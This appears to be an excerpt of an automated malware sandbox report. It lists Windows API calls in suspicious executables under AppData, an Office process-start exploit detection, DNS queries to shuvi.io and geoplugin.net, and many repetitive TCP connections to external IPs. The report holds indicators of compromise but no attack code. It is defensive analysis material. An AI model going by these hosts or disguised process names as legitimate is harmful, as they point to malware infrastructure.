Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_0021C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	10_2_0021C7E8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012C449B GetFileAttributesW,FindFirstFileW,FindClose,	11_2_012C449B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012CC75D FindFirstFileW,FindClose,	11_2_012CC75D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012CC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	11_2_012CC7E8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012CF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_012CF17E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012CF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_012CF021
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012CF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	11_2_012CF47F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012C3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_012C3833
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012C3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_012C3B56
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012CBD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	11_2_012CBD48

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\	Jump to behavior

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Source: global traffic	DNS query: name: shuvi.io
Source: global traffic	DNS query: name: shuvi.io
Source: global traffic	DNS query: name: shuvi.io
Source: global traffic	DNS query: name: shuvi.io
Source: global traffic	DNS query: name: shuvi.io
Source: global traffic	DNS query: name: shuvi.io
Source: global traffic	DNS query: name: shuvi.io
Source: global traffic	DNS query: name: shuvi.io
Source: global traffic	DNS query: name: geoplugin.net

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.237.33.50:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
